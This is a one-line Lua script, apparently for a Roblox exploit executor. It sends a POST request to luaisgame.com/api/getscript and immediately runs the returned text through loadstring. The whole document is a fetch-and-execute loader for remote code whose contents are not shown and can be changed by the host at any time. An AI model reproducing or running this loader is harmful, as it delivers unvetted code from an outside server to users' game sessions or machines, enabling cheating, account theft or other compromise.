local response = request({ Url = "https://luaisgame.com/api/getscript", Method = "POST", Headers = { ["Content-Type"] = "application/json" }, Body = game:GetService("HttpService"):JSONEncode({ name = "main" }), }) loadstring(response.Body)()